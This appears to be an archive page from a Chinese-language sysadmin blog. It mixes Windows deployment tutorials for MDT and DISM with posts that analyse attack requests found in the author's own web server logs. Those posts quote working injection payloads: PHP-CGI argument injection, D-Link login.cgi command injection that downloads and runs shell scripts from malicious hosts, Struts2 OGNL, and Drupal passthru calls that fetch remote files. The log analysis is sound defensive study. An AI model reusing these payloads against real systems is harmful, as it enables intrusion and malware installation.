139.219.100.104 - - [23/Jul/2018:17:23:26 +0800] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 209 "-" "-"
轉碼後:
"POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n HTTP/1.1"
2018年7月23日 星期一
2018年7月22日 星期日
從 Web Log 學習系統漏洞 18
不知是什麼鬼, 最近來很多
好像是 D-Link DSL-2750B 的漏洞遠端攻擊
https://www.exploit-db.com/exploits/44760/
156.218.224.172 - - [22/Jul/2018:08:47:24 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
41.44.216.34 - - [22/Jul/2018:09:05:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
41.238.160.154 - - [22/Jul/2018:09:25:18 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:50 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
197.32.107.117 - - [22/Jul/2018:16:34:49 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
好像是 D-Link DSL-2750B 的漏洞遠端攻擊
https://www.exploit-db.com/exploits/44760/
156.218.224.172 - - [22/Jul/2018:08:47:24 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
41.44.216.34 - - [22/Jul/2018:09:05:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
41.238.160.154 - - [22/Jul/2018:09:25:18 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:50 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
197.32.107.117 - - [22/Jul/2018:16:34:49 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
2018年7月19日 星期四
使用MDT(Microsoft Deployment Toolkit)部署安裝Windows OS - 2.用戶端安裝 Windows Server 2016
很可惜 MDT 還無法使用完全網路自動化安裝, 如果要用網路自動化安裝就要搭配 WDS(Windows Deployment Services)
預先準備: 帶有ADDS, DNS, DHCP的伺服器及MDT伺服器, 以便網路連線安裝
1. 以Hyper-V 新增一部測試安裝的用戶端VM, 將複製來的 LiteTouchPE_x64.iso 設定到光碟映像, 並設定以光碟機開機
2. 開機之後會進入到 MDT 的部署程序
使用MDT(Microsoft Deployment Toolkit)部署安裝Windows OS - 1.安裝MDT及設定(以Windows Server 2016為例)
MDT (Microsoft Deployment Toolkit)是適用於自動執行桌面與伺服器部署的整合工具、程序及指導方針的集合, 除了減少部署時間並將桌面和伺服器映像標準化之外, MDT 讓您能夠更輕鬆地管理安全性和持續進行的設定, MDT 建置於 Windows 評定及部署套件 (Windows ADK) 中核心部署工具的頂端, 並具備設計來降低在企業環境中部署所需之複雜度與時間的其他指導方針和功能, MDT 支援 Windows 10 以及 Windows 7、Windows 8、Windows 8.1 和 Windows Server 2012 R2 的部署(Windows Server 2016也可)
只是現階段 MDT 只有英文版, 而且需自行下載安裝...
https://docs.microsoft.com/zh-tw/sccm/mdt/
1. 開始安裝 Microsoft Deployment Toolkit
2. 接受使用授權
從 Web Log 學習系統漏洞 17
利用 Apache Struts2 漏洞進行遠端攻擊
//(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=/
//(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=/
2018年7月13日 星期五
從 Web Log 學習系統漏洞 16
一個哥倫比亞不知什麼組織的網站被當成跳板吧, 試圖抓(下載)東西到我主機
//?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=curl https://www.ccpalmira.org.co/bakso.php | wget https://www.ccpalmira.org.co/bakso.php
//?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=curl https://www.ccpalmira.org.co/bakso.php | wget https://www.ccpalmira.org.co/bakso.php
2018年7月7日 星期六
DISM圖形化介面軟體: DISM++
在用 DISM 作 Windows Server 2016 安裝光碟中文化時, 估狗到這個圖形化介面的 DISM, 這軟體還蠻方便的, 省去輸入一堆指令的麻煩, 而且功能也很多, 操作起來很容易
1. 執行 DISM++ 的開始畫面, 現在首頁抓的內容是你當前使用的作業系統
2. 主要用到的功能: 掛載映像, 儲存映像, 移除映像(卸載)
1. 執行 DISM++ 的開始畫面, 現在首頁抓的內容是你當前使用的作業系統
2. 主要用到的功能: 掛載映像, 儲存映像, 移除映像(卸載)
2018年7月4日 星期三
利用DISM製作繁體中文化(台灣)Windows Server 2016 安裝光碟(iso)
由於微軟一直未開放下載繁體中文版的 Windows Server 2016 試用版, 我們可以利用 DISM (Deployment Image Servicing and Management) 的功能將繁體中文套件裝入英文版的 Windows Server 2016 中
首先要準備4個東西:
1) Windows Server 2016 英文試用版
2) Windows 10 中文試用版 (x64)
3) 繁體中文化套件Language Package (微軟似乎沒公開下載, 不過估狗一下就能找到)
4) 安裝 Windows ADK (Assessment and Deployment Kit) 軟體
1. 預先在硬碟中建立一個[來源檔]目錄, 把 Win2016 英文試用版中的所有檔案複製過去
2. 再建立一個 DISM 會[掛載]映像檔的目錄備用
